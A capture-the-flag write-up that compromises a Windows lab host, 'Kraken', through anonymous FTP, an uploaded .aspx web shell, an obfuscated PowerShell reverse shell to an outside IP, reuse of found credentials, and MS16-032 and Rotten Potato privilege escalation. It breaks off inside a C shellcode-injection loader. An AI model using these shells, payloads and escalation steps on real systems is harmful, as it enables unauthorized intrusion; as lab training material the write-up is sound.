Fatec Ourinhos CTF 2018 Writeup
Introduction
This is a write-up for the 2nd edition of the Fatec Ourinhos CTF 2018. I describe in detail how to get the flag on the Kraken machine.
The machine's original name is Kraken; it was part of the personal pentest lab I built in 2017 for my team, WATCHERS.
Challenge information
· Name: Unleash the Kraken
· Our target has IP address 192.168.56.100 and host name kraken.wtc.
· Operating system: Windows
Enumeration and scanning
Nmap gave us the following output:
[root:~] nmap 192.168.56.100 -Pn -sT
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-16 14:22 PDT
Nmap scan report for 192.168.56.100
Host is up, received user-set (0.10s latency).
Not shown: 990 filtered ports
Reason: 990 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       REASON
21/tcp    open  ftp           syn-ack
80/tcp    open  http          syn-ack
135/tcp   open  msrpc         syn-ack
443/tcp   open  https         syn-ack
1723/tcp  open  pptp          syn-ack
3389/tcp  open  ms-wbt-server syn-ack
49153/tcp open  unknown       syn-ack
49154/tcp open  unknown       syn-ack
49156/tcp open  unknown       syn-ack
49157/tcp open  unknown       syn-ack
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds
Clearly we have a website and an FTP server to test. The other services all need credentials, and we have none yet.
The website is just a picture of a kraken, as shown in the screenshot below:
Let's send a cURL request to the HTTP port and see what we get:
[root:~] curl http://192.168.56.100
<html>
<body>
<div align="center">
<h1>Release the kraken!</h1>
<img src="kraken-pic.jpg"/>
</div>
<!-- Username: DavyJones -->
<!-- Password: #kr4kud0o0O -->
</body>
</html>
The page source hands us a set of credentials. Logging in to FTP (port 21) with them failed, and logging in to RDP (port 3389) failed as well!
Next I tried the anonymous account on FTP, and that actually worked!
[root:~] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,359,065,088 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-17-2018  01:08PM       <DIR>          kraken
05-17-2018  02:01PM       <DIR>          uploads
05-17-2018  01:08PM       <DIR>          App_Data
05-17-2018  11:26AM                  189 index.html
05-17-2018  11:21AM                53404 kraken-pic.jpg
226-Directory has 49,359,065,088 bytes of disk space available.
226 Transfer complete.
ftp>
Anonymous FTP drops us in the web root (the same index.html and kraken-pic.jpg the site serves), so let's try to upload a file.
[root:/tmp] echo 'andre' >> file.txt
[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,354,731,520 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
550 Access is denied.
ftp>
We have no permission to upload there. But maybe another folder allows it? The uploads folder exists to receive files, so it should be writable!
ftp> cd uploads
250 CWD command successful.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
7 bytes sent in 0.00 secs (175.2805 kB/s)
ftp> exit
221 Goodbye.
[root:/tmp] curl http://192.168.56.100/uploads/file.txt
andre
[root:/tmp]
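The three manual steps above (anonymous login, try a write in each directory, fetch the result over HTTP) are worth scripting so you can run them against every directory the listing shows instead of guessing. The following Python is an added example and not part of the original write-up: it parses the Microsoft FTP Service listing format seen above, probes each directory with a throw-away marker file, and checks whether the marker is served by the web server. The host and web base URL are command-line arguments, and the marker file names are its own invention.

```python
"""Anonymous-FTP write probe for a Microsoft FTP Service host.

Added example, not code from the original write-up. Host, port and the
web base URL passed on the command line are lab assumptions; the listing
format is the one the Microsoft FTP Service prints (as in the dir output
above)."""
import io
import re
import sys
import uuid
import ftplib
import urllib.request
import urllib.error

# One "dir" line from Microsoft FTP Service, e.g.
#   05-17-2018  01:08PM       <DIR>          uploads
#   05-17-2018  11:26AM                  189 index.html
MSFTP_LINE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2,4})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?:(?P<dir><DIR>)|(?P<size>\d+))\s+(?P<name>.+?)\s*$"
)


def parse_msftp_listing(lines):
    """Return [(name, is_dir, size)]; lines that are not entries are skipped."""
    entries = []
    for line in lines:
        m = MSFTP_LINE.match(line)
        if m:
            is_dir = m.group("dir") is not None
            size = 0 if is_dir else int(m.group("size"))
            entries.append((m.group("name"), is_dir, size))
    return entries


def remote_path(directory, name):
    """Join an FTP directory and a file name ('' or '/' meaning the FTP root)."""
    d = directory.strip("/")
    return f"{d}/{name}" if d else name


def probe_writable_dirs(ftp, directories, marker_prefix="probe-"):
    """STOR a tiny marker file into each directory.

    Returns {directory: marker_path} where the write succeeded and
    {directory: None} where the server answered with a permanent error
    (e.g. "550 Access is denied." as seen on the web root above)."""
    results = {}
    for d in directories:
        marker = remote_path(d, f"{marker_prefix}{uuid.uuid4().hex[:8]}.txt")
        try:
            ftp.storbinary(f"STOR {marker}", io.BytesIO(b"probe\n"))
            results[d] = marker
        except ftplib.error_perm:
            results[d] = None
    return results


def is_web_exposed(base_url, marker, expected=b"probe\n"):
    """True if the marker uploaded over FTP is served back by the web server."""
    try:
        with urllib.request.urlopen(f"{base_url.rstrip('/')}/{marker}", timeout=5) as r:
            return r.read() == expected
    except (urllib.error.HTTPError, urllib.error.URLError):
        return False


def main(host, base_url):
    ftp = ftplib.FTP(host, timeout=10)
    ftp.login()  # anonymous / anonymous@
    lines = []
    ftp.retrlines("LIST", lines.append)
    dirs = [""] + [name for name, is_dir, _ in parse_msftp_listing(lines) if is_dir]
    for d, marker in probe_writable_dirs(ftp, dirs).items():
        if marker is None:
            print(f"[-] {d or '/'}: not writable")
            continue
        print(f"[+] {d or '/'}: writable, served over HTTP: {is_web_exposed(base_url, marker)}")
        try:
            ftp.delete(marker)  # clean up our own marker
        except ftplib.error_perm:
            print(f"    (could not delete {marker}; remove it by hand)")
    ftp.quit()


if __name__ == "__main__":
    # e.g. python3 ftp_probe.py 192.168.56.100 http://192.168.56.100
    main(sys.argv[1], sys.argv[2])
```

A directory that is writable over FTP but not served over HTTP is still worth noting (it may be a drop folder processed by something else), and a write-only drop folder may refuse the delete, which is why the script reports markers it could not remove.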
Exploitation
Now we know a way to upload arbitrary files, and the uploaded files are reachable from a browser. Since IIS executes an .aspx file placed under its web root, it is now just a matter of uploading a web shell to get a shell on the Kraken host.
[root:/tmp] cp /usr/share/webshells/aspx/cmdasp.aspx .
[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,345,097,728 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> cd uploads
250 CWD command successful.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (42.9749 MB/s)
Now browse to the web shell and send commands!
Getting a shell on the host
To get a proper shell, I used Shellpop, the reverse-shell generator I wrote, as follows:
[root:/tmp] shellpop --payload windows/reverse/tcp/powershell -H tun0 -P 443
[+] Execute this code in remote target:
powershell.exe -nop -ep bypass -Command "$cFYlLK='10.11.12.26';$BfKleTWqoeSd=443;$czOaNBi=New-Object System.Net.Sockets.TCPClient($cFYlLK,$BfKleTWqoeSd);$QHFXyM=$czOaNBi.GetStream();[byte[]]$xdjeYJjrFCJTTT=0..65535|%{0};$tBoRkCjv=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);while(($LOlZmTcyLFlYNih=$QHFXyM.Read($xdjeYJjrFCJTTT,0,$xdjeYJjrFCJTTT.Length)) -ne 0){$qLUSJN=([text.encoding]::ASCII).GetString($xdjeYJjrFCJTTT,0,$LOlZmTcyLFlYNih);try{$yWMBwfso=(Invoke-Expression -c $qLUSJN 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$cFYlLK0=$yWMBwfso+'PS '+(Get-Location).Path+'> ';$cFYlLK1=($cFYlLK2[0]|Out-String);$cFYlLK2.clear();$cFYlLK0=$cFYlLK0+$cFYlLK1;$tBoRkCjv=([text.encoding]::ASCII).GetBytes($cFYlLK0);$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);$QHFXyM.Flush();};$czOaNBi.Close();if($cFYlLK3){$cFYlLK3.Stop();};"
[+] This shell DOES NOT have a handler set.
[root:/tmp]# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49244.
PS C:\windows\system32\inetsrv>
We now have an OS shell on the host, running as the IIS application pool account. There are several ways to reach SYSTEM on this machine, but that belongs to the privilege escalation phase.
Privilege escalation
If you spend a little more time on system enumeration, you quickly notice that this machine is missing a lot of patches.
PS C:\windows\system32\inetsrv> Get-Hotfix | Where-Object { $_.Description -eq "Security Update" }

Source Description     HotFixID  InstalledBy          InstalledOn
------ -----------     --------  -----------          -----------
KRAKEN Security Update KB2479943                      6/15/2015 ...
KRAKEN Security Update KB2491683                      6/15/2015 ...
KRAKEN Security Update KB2506212                      6/15/2015 ...
KRAKEN Security Update KB2509553                      6/15/2015 ...
KRAKEN Security Update KB2511455                      6/15/2015 ...
KRAKEN Security Update KB2525835                      6/15/2015 ...
KRAKEN Security Update KB2536275                      6/15/2015 ...
KRAKEN Security Update KB2536276                      6/15/2015 ...
KRAKEN Security Update KB2544893                      6/15/2015 ...
KRAKEN Security Update KB2560656                      6/15/2015 ...
KRAKEN Security Update KB2564958                      6/15/2015 ...
KRAKEN Security Update KB2570947                      6/15/2015 ...
KRAKEN Security Update KB2585542                      6/15/2015 ...
KRAKEN Security Update KB2604115                      6/15/2015 ...
KRAKEN Security Update KB2620704                      6/15/2015 ...
KRAKEN Security Update KB2621440                      6/15/2015 ...
KRAKEN Security Update KB2631813                      6/15/2015 ...
KRAKEN Security Update KB2643719                      6/15/2015 ...
KRAKEN Security Update KB2654428                      6/15/2015 ...
KRAKEN Security Update KB2667402                      6/15/2015 ...
KRAKEN Security Update KB2676562                      6/15/2015 ...
KRAKEN Security Update KB2690533                      6/15/2015 ...
KRAKEN Security Update KB2698365                      6/15/2015 ...
KRAKEN Security Update KB2705219                      6/15/2015 ...
KRAKEN Security Update KB2712808                      6/15/2015 ...
KRAKEN Security Update KB2727528                      6/15/2015 ...
KRAKEN Security Update KB2736422                      6/15/2015 ...
KRAKEN Security Update KB2742599                      6/15/2015 ...
KRAKEN Security Update KB2765809 KRAKEN\Administrator 6/15/2015 ...
KRAKEN Security Update KB2770660                      6/15/2015 ...
KRAKEN Security Update KB2807986                      6/15/2015 ...
KRAKEN Security Update KB2813347                      6/15/2015 ...
KRAKEN Security Update KB2813430                      6/15/2015 ...
KRAKEN Security Update KB2832414                      6/15/2015 ...
KRAKEN Security Update KB2835361                      6/15/2015 ...
KRAKEN Security Update KB2839894                      6/15/2015 ...
KRAKEN Security Update KB2840631                      6/15/2015 ...
KRAKEN Security Update KB2847927                      6/15/2015 ...
KRAKEN Security Update KB2861191                      6/15/2015 ...
KRAKEN Security Update KB2861698                      6/15/2015 ...
KRAKEN Security Update KB2862152                      6/15/2015 ...
KRAKEN Security Update KB2862330                      6/15/2015 ...
KRAKEN Security Update KB2862335                      6/15/2015 ...
KRAKEN Security Update KB2862973                      6/15/2015 ...
KRAKEN Security Update KB2864058                      6/15/2015 ...
KRAKEN Security Update KB2864202                      6/15/2015 ...
KRAKEN Security Update KB2868038                      6/15/2015 ...
KRAKEN Security Update KB2871997                      6/15/2015 ...
KRAKEN Security Update KB2872339                      6/15/2015 ...
KRAKEN Security Update KB2884256                      6/15/2015 ...
KRAKEN Security Update KB2887069                      6/15/2015 ...
KRAKEN Security Update KB2892074                      6/15/2015 ...
KRAKEN Security Update KB2893294                      6/15/2015 ...
KRAKEN Security Update KB2894844                      6/15/2015 ...
KRAKEN Security Update KB2898851                      6/15/2015 ...
KRAKEN Security Update KB2900986                      6/15/2015 ...
KRAKEN Security Update KB2911501                      6/15/2015 ...
KRAKEN Security Update KB2912390                      6/15/2015 ...
KRAKEN Security Update KB2918614                      6/15/2015 ...
KRAKEN Security Update KB2922229                      6/15/2015 ...
KRAKEN Security Update KB2923392                      6/15/2015 ...
KRAKEN Security Update KB2931356                      6/15/2015 ...
KRAKEN Security Update KB2937610                      6/15/2015 ...
KRAKEN Security Update KB2939576                      6/15/2015 ...
KRAKEN Security Update KB2943357                      6/15/2015 ...
KRAKEN Security Update KB2957189                      6/15/2015 ...
KRAKEN Security Update KB2957503                      6/15/2015 ...
KRAKEN Security Update KB2957509                      6/15/2015 ...
KRAKEN Security Update KB2961072                      6/15/2015 ...
KRAKEN Security Update KB2968294                      6/15/2015 ...
KRAKEN Security Update KB2971850                      6/15/2015 ...
KRAKEN Security Update KB2972100                      6/15/2015 ...
KRAKEN Security Update KB2972211                      6/15/2015 ...
KRAKEN Security Update KB2972280                      6/15/2015 ...
KRAKEN Security Update KB2973112                      6/15/2015 ...
KRAKEN Security Update KB2973201                      6/15/2015 ...
KRAKEN Security Update KB2973351                      6/15/2015 ...
KRAKEN Security Update KB2976627                      6/15/2015 ...
KRAKEN Security Update KB2976897                      6/15/2015 ...
KRAKEN Security Update KB2977292                      6/15/2015 ...
KRAKEN Security Update KB2978120                      6/15/2015 ...
KRAKEN Security Update KB2978668                      6/15/2015 ...
KRAKEN Security Update KB2979570                      6/15/2015 ...
KRAKEN Security Update KB2984972                      6/15/2015 ...
KRAKEN Security Update KB2991963                      6/15/2015 ...
KRAKEN Security Update KB2992611                      6/15/2015 ...
KRAKEN Security Update KB2993958                      6/15/2015 ...
KRAKEN Security Update KB3002657 KRAKEN\Administrator 6/15/2015 ...
KRAKEN Security Update KB3003743                      6/15/2015 ...
KRAKEN Security Update KB3004361                      6/15/2015 ...
KRAKEN Security Update KB3004375                      6/15/2015 ...
KRAKEN Security Update KB3008923                      6/15/2015 ...
KRAKEN Security Update KB3010788                      6/15/2015 ...
KRAKEN Security Update KB3011780                      6/15/2015 ...
KRAKEN Security Update KB3014029 KRAKEN\Administrator 6/15/2015 ...
KRAKEN Security Update KB3019215                      6/15/2015 ...
KRAKEN Security Update KB3020388                      6/15/2015 ...
KRAKEN Security Update KB3021674                      6/15/2015 ...
KRAKEN Security Update KB3021952                      6/15/2015 ...
KRAKEN Security Update KB3022777                      6/15/2015 ...
KRAKEN Security Update KB3023215                      6/15/2015 ...
KRAKEN Security Update KB3030377                      6/15/2015 ...
KRAKEN Security Update KB3032323                      6/15/2015 ...
KRAKEN Security Update KB3032359                      6/15/2015 ...
KRAKEN Security Update KB3032655                      6/15/2015 ...
KRAKEN Security Update KB3033889                      6/15/2015 ...
KRAKEN Security Update KB3033929                      6/15/2015 ...
KRAKEN Security Update KB3034344                      6/15/2015 ...
KRAKEN Security Update KB3035126                      6/15/2015 ...
KRAKEN Security Update KB3035132                      6/15/2015 ...
KRAKEN Security Update KB3037574                      6/15/2015 ...
KRAKEN Security Update KB3039066                      6/15/2015 ...
KRAKEN Security Update KB3042553                      6/15/2015 ...
KRAKEN Security Update KB3045171                      6/15/2015 ...
KRAKEN Security Update KB3045685                      6/15/2015 ...
KRAKEN Security Update KB3045999                      6/15/2015 ...
KRAKEN Security Update KB3046002                      6/15/2015 ...
KRAKEN Security Update KB3046049                      6/15/2015 ...
KRAKEN Security Update KB3046269                      6/15/2015 ...
KRAKEN Security Update KB3046306                      6/15/2015 ...
KRAKEN Security Update KB3046482                      6/15/2015 ...
KRAKEN Security Update KB3048070                      6/15/2015 ...
KRAKEN Security Update KB3049563                      6/15/2015 ...
KRAKEN Security Update KB3051768                      6/15/2015 ...
KRAKEN Security Update KB3055642                      6/15/2015 ...
KRAKEN Security Update KB3057839                      6/15/2015 ...
KRAKEN Security Update KB3058515                      6/15/2015 ...
KRAKEN Security Update KB3059317                      6/15/2015 ...
KRAKEN Security Update KB3061518                      6/15/2015 ...
KRAKEN Security Update KB3063858                      6/15/2015 ...

PS C:\windows\system32\inetsrv>
The most recent patch is KB3063858, installed in June 2015! That is an old patch level. Several exploits can now take us to SYSTEM, for example:
· MS16-032
· MS16-075
Both exploits work and were confirmed to escalate privileges. Next I describe in detail how to use each of them.
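Reading 130 rows by eye is error-prone, so here is an added Python example (not part of the original write-up) that takes a Get-HotFix dump and checks it for the hotfixes that close the two bulletins above. The KB numbers are Microsoft's hotfix IDs for MS16-032 (KB3139914) and MS16-075 (KB3161561); the sample rows are constructed from the listing above and trimmed to a few entries.

```python
"""Triage a Get-HotFix dump for the two escalation paths used on Kraken.

Added example, not from the original write-up. The KB numbers are the
Microsoft hotfixes for the bulletins (MS16-032 -> KB3139914,
MS16-075 -> KB3161561). SAMPLE is constructed from the listing above."""
import re
from datetime import datetime

# Bulletin -> (hotfix KB, why it matters here)
KB_FOR_BULLETIN = {
    "MS16-032": ("KB3139914", "Secondary Logon race; SYSTEM from an interactive session"),
    "MS16-075": ("KB3161561", "local NTLM relay (Rotten Potato) from a SeImpersonatePrivilege token"),
}

KB_RE = re.compile(r"\bKB(\d{6,7})\b")
DATE_RE = re.compile(r"\b(\d{1,2}/\d{1,2}/\d{4})\b")


def installed_kbs(hotfix_output):
    """Every KB id in the text, whatever column layout Get-HotFix used."""
    return {f"KB{n}" for n in KB_RE.findall(hotfix_output)}


def highest_kb(hotfix_output):
    """KB ids grow roughly with release date, so the numerically highest one
    is a quick proxy for 'newest patch' (KB3063858 in the write-up)."""
    kbs = installed_kbs(hotfix_output)
    return max(kbs, key=lambda k: int(k[2:])) if kbs else None


def latest_install_date(hotfix_output):
    """Most recent InstalledOn value (m/d/yyyy, as Get-HotFix prints it)."""
    dates = [datetime.strptime(d, "%m/%d/%Y").date() for d in DATE_RE.findall(hotfix_output)]
    return max(dates) if dates else None


def missing_bulletins(hotfix_output, table=KB_FOR_BULLETIN):
    """Bulletins whose hotfix KB is absent. Treat it as a hint only:
    Windows 7 / 2008 R2 moved to cumulative monthly rollups in October 2016,
    and a box patched through rollups will not list these per-bulletin KBs
    even though it is fixed. Confirm with the OS build or by trying the exploit."""
    present = installed_kbs(hotfix_output)
    return {b: kb for b, (kb, _) in table.items() if kb not in present}


# Constructed sample in Get-HotFix's default table layout.
SAMPLE = """\
Source Description     HotFixID  InstalledBy          InstalledOn
------ -----------     --------  -----------          -----------
KRAKEN Security Update KB2479943                      6/15/2015 ...
KRAKEN Security Update KB3002657 KRAKEN\\Administrator 6/15/2015 ...
KRAKEN Security Update KB3063858                      6/15/2015 ...
"""

if __name__ == "__main__":
    print("highest KB   :", highest_kb(SAMPLE))
    print("last install :", latest_install_date(SAMPLE))
    for bulletin, kb in missing_bulletins(SAMPLE).items():
        print(f"{bulletin}: {kb} not installed -> {KB_FOR_BULLETIN[bulletin][1]}")
```

Pipe the real output in with `Get-HotFix | Out-String -Width 200` on the target (or save it from the web shell) and feed the text to these functions; the regexes do not depend on column positions, so a wrapped or narrowed table still parses.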
MS16-032
This vulnerability is a race condition in the Secondary Logon service on multi-core (important detail) Windows machines that lets an attacker obtain SYSTEM privileges.
You can get the PowerShell version of this exploit here.
One more detail: this exploit cannot be used from Session 0, the non-interactive session in which Windows services (including the IIS worker process our web shell lives in) run. What is Session 0? You can read more about it at this link.
Once you understand Session 0, it is clear that we need an interactive Windows session to exploit this vulnerability.
We can get an interactive session through Remote Desktop; the host has 3389 open, but we could not log in there with the credentials found on the web page.
So let's list the users on the server.
There are two users: DavyJones (whose password we know) and JackSparrow (whose password we do not). Let's look at the group memberships of both.
DavyJones is a regular user. Not that interesting. What about JackSparrow?
Now we know that JackSparrow has the right to log in over Remote Desktop. If we can log in to 3389 as that account, we can use MS16-032 to escalate to SYSTEM. So let's use DavyJones's credentials and browse DavyJones's files from PowerShell.
With the following PowerShell command we can run commands as DavyJones through the web shell (this goes over WinRM, i.e. PowerShell Remoting, so it only works because that service is enabled on Kraken and accepts the loopback connection with alternate credentials):
powershell -nop -ep bypass -command $u='KRAKEN\DavyJones';$p='#kr4kud0o0O';$c=convertTo-SecureString -AsPlainText -Force $p;$c=new-object system.management.automation.pscredential($u,$c);Invoke-Command -ComputerName 127.0.0.1 -Credential $c -ScriptBlock { whoami}
Now let's get a reverse shell as DavyJones; with Shellpop this is easy.
To generate a clean (base64-encoded) reverse TCP PowerShell command with my tool, use:
[root:/tmp] shellpop --payload windows/reverse/tcp/powershell -H tun0 -P 443 --base64
[+] Execute this code in remote target:
powershell.exe -nop -ep bypass -Encoded <base64-encoded payload>
[+] This shell DOES NOT have a handler set.
So the command we finally run through the web shell is:
powershell -nop -ep bypass -command $u='KRAKEN\DavyJones';$p='#kr4kud0o0O';$c=convertTo-SecureString -AsPlainText -Force $p;$c=new-object system.management.automation.pscredential($u,$c);Invoke-Command -ComputerName 127.0.0.1 -Credential $c -ScriptBlock { powershell.exe -nop -ep bypass -Encoded <base64-encoded payload>}
And we get a reverse shell as DavyJones!
We quickly find Jack Sparrow's password stored in a text file in Davy Jones's Documents folder.
The following command connects over RDP and gives us an interactive session!
[root:/tmp] rdesktop -u 'JackSparrow' -p 'sp4rr0w_rul3z' 192.168.56.100
Once logged in over RDP, the next step is to download the exploit script, but we quickly find that script execution is disabled; see the screenshot below.
To get around this restriction we can use the following PowerShell command:
Set-ExecutionPolicy -Scope CurrentUser Bypass
With that out of the way (the execution policy is a safety rail, not a security boundary, and changing it for the CurrentUser scope needs no admin rights) we can run the script and escalate our privileges to SYSTEM!
MS16-075
This one applies to Windows service accounts that hold SeImpersonatePrivilege. MS16-075 fixed a flaw in how Windows handled local NTLM authentication: a local process could relay a SYSTEM authentication (triggered through DCOM, which is what Rotten Potato does) back to itself and end up holding a SYSTEM token. Because our account has SeImpersonatePrivilege, we can impersonate that token and escalate to SYSTEM.
The IIS and SQL Server service accounts have this privilege, so if we have a shell as IIS or SQL Server on a host that is missing MS16-075, we can use this exploit.
To exploit it I used the Rotten Potato tool. It is used with the Metasploit incognito extension, so we need a meterpreter session; to get one I chose custom C code that injects shellcode into a remote process.
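Before reaching for Rotten Potato it pays to confirm the precondition from the paragraph above. The following Python is an added example, not part of the original write-up: it reads `whoami /priv` output and says whether the token is a candidate. The sample text is constructed to look like an IIS application-pool token on an English Windows; other locales translate the privilege descriptions and states, so feed it English output only.

```python
"""Is this token a Rotten Potato / MS16-075 candidate? Decide from `whoami /priv`.

Added example, not from the original write-up. SAMPLE_APPPOOL and SAMPLE_USER
are constructed; English `whoami /priv` output is assumed."""
import re
import sys

# Either privilege lets a local NTLM-relay "potato" turn a captured SYSTEM
# token into SYSTEM code execution (impersonate it, or use it as a primary token).
IMPERSONATION_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# e.g. "SeImpersonatePrivilege  Impersonate a client after authentication  Enabled"
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)$")


def parse_whoami_priv(output):
    """{privilege_name: 'Enabled' | 'Disabled'} from `whoami /priv` text."""
    privs = {}
    for line in output.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def potato_candidate(privs):
    """Return (qualifies, held_privileges).

    'Disabled' still counts: the privilege is present in the token and the
    process can switch it on with AdjustTokenPrivileges. Only absence from the
    list rules the token out (a plain user such as DavyJones has neither)."""
    held = [p for p in IMPERSONATION_PRIVS if p in privs]
    return bool(held), held


# Constructed: what an IIS APPPOOL token typically shows.
SAMPLE_APPPOOL = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed: a regular interactive user.
SAMPLE_USER = """\
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_APPPOOL
    ok, held = potato_candidate(parse_whoami_priv(text))
    print("candidate" if ok else "not a candidate", held)
```

Run `whoami /priv` from the web shell, paste the output into this script (or pipe it in), and only then spend time on the meterpreter and Rotten Potato steps that follow.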
#include <windows.h>

/* Implemented elsewhere in the loader (not shown on the page); the
   signatures below are assumed from the calls in main(): spawn a benign
   host process and return its PID, then inject the buffer into that PID. */
DWORD CreateDecoyProcess(void);
void InjectShellcode(BYTE *shellcode, SIZE_T size, DWORD pid);

int main() {
    SIZE_T szShellcode = 476;  /* length of the stager below */
    BYTE shellcode[] = {
        0xbd,0x82,0xcd,0xe3,0x7c,0xdb,0xda,0xd9,0x74,0x24,0xf4,0x58,0x31,0xc9,0xb1,
        0x71,0x83,0xe8,0xfc,0x31,0x68,0x0f,0x03,0x68,0x8d,0x2f,0x16,0x80,0xd9,0x2c,
        0x3d,0x89,0x31,0xfe,0xbe,0x6a,0xc1,0xbe,0xef,0x2b,0x91,0x12,0x41,0xfa,0x59,
        0xa2,0xb3,0x67,0x11,0x4f,0x61,0x08,0xe9,0xc4,0xd4,0xd0,0xa1,0x51,0x8a,0xc0,
        0x79,0xed,0x59,0x51,0x31,0xfe,0x2a,0x1b,0x8b,0x4d,0x64,0x55,0x43,0x7f,0x46,
        0xc9,0x6f,0x1e,0x3a,0x10,0xa3,0xc0,0x83,0xd5,0x72,0x0d,0x45,0xd7,0x45,0xec,
        0xa8,0x85,0x04,0xa0,0x7a,0xa1,0xd4,0x62,0xf0,0xf7,0xe4,0x2a,0x07,0x28,0x72,
        0x2a,0x7f,0xd0,0x71,0x2e,0x8f,0x65,0xf7,0x2e,0x8f,0x65,0x7c,0xae,0x07,0x65,
        0x82,0xaf,0x5f,0xe3,0x42,0xdb,0x38,0xa3,0x43,0xf4,0x97,0xb8,0x0b,0xec,0x53,
        0x34,0xcb,0x2c,0x15,0x4b,0x1b,0xcf,0xf3,0x03,0x64,0xd9,0xbd,0x18,0xae,0x52,
        0x75,0x1e,0x18,0x2f,0xb7,0xe9,0xec,0x81,0x77,0x45,0xad,0x20,0xbe,0x9b,0x6c,
        0xa2,0x80,0x9c,0x8e,0xd1,0xf3,0x91,0x4d,0x56,0xd0,0x21,0x14,0x5f,0xc9,0x47,
        0x4e,0xc7,0xad,0x2c,0x2e,0xdc,0x64,0x32,0x7e,0x7a,0x36,0xbf,0x72,0xcb,0xfc,
        0x34,0xca,0xd7,0xb5,0x4b,0x1a,0xa6,0xce,0x48,0x12,0x61,0xd0,0x80,0x63,0x2a,
        0x93,0x78,0x3d,0x93,0x49,0x38,0x99,0x62,0x37,0xfb,0x43,0x2d,0x44,0x17,0x53,
        0xec,0x18,0x17,0x73,0xb6,0xdd,0xbe,0x29,0x0f,0x55,0x52,0x24,0xc4,0x96,0xac,
        0x49,0x86,0x21,0xed,0xc2,0x4a,0x80,0x4e,0x1f,0x9f,0xe4,0x70,0x1e,0x89,0xad,
        0xf9,0x46,0x7d,0xaf,0x16,0x26,0x7f,0xaf,0xe6,0x6f,0x09,0x4a,0xaf,0xd3,0x0b,
        0x95,0x31,0x90,0x06,0x9e,0x3d,0xfc,0x57,0xf4,0x74,0x89,0xbc,0xb8,0x0f,0x78,
        0x7d,0xfb,0x5c,0x0d,0x58,0xfc,0xa3,0x24,0xe8,0x8b,0xb6,0xae,0xf0,0x8a,0x46,
        0x2e,0xaa,0xcd,0xfc,0x07,0xcc,0xa5,0x00,0xa8,0x19,0x53,0x0b,0x17,0xfc,0xf4,
        0x5b,0xda,0x31,0x3c,0x16,0xd5,0xf1,0xf6,0x56,0xd5,0xba,0x8f,0x6b,0x9d,0xc5,
        0x50,0x23,0x94,0xfb,0x10,0x0e,0x4c,0xf4,0x4d,0x8e,0x6f,0xde,0x3a,0xc6,0x48,
        0x8b,0xaa,0x99,0x0e,0x00,0x42,0xfb,0xe6,0x11,0xad,0xbd,0x4c,0xb8,0xeb,0x4a,
        0xd1,0x44,0x26,0x37,0xd1,0xcf,0xc5,0x71,0x2e,0xe1,0xa3,0x64,0xb8,0x0e,0xfe,
        0xc5,0x6e,0x10,0xd4,0x42,0x0d,0x02,0xc7,0x1a,0x98,0x39,0xa5,0xab,0x53,0xd7,
        0x32,0x8d,0x3b,0x60,0xb2,0xf4,0xfa,0xca,0xc6,0xdf,0x34,0x75,0x38,0x0a,0x8c,
        0x09,0x02,0x95,0x52,0x87,0x7d,0xbc,0x2a,0xd6,0xd8,0x29,0xaa,0xc8,0xda,0xa9,
        0xeb,0xb0,0x92,0x20,0x19,0x08,0x12,0xfa,0x9c,0x33,0x0c,0x58,0x4d,0xa1,0x52,
        0x75,0x39,0xa0,0x6e,0x3f,0x30,0x75,0x3d,0xf1,0x8b,0x33,0x37,0x01,0x43,0x4d,
        0x9d,0xaa,0xda,0xb4,0x63,0x91,0xde,0x9f,0xac,0xba,0x21,0xca,0x65,0x44,0x1e,
        0xbd,0x5c,0x80,0xe8,0xbb,0x69,0x79,0x09,0x82,0x6a,0x65
    };
    DWORD pid;

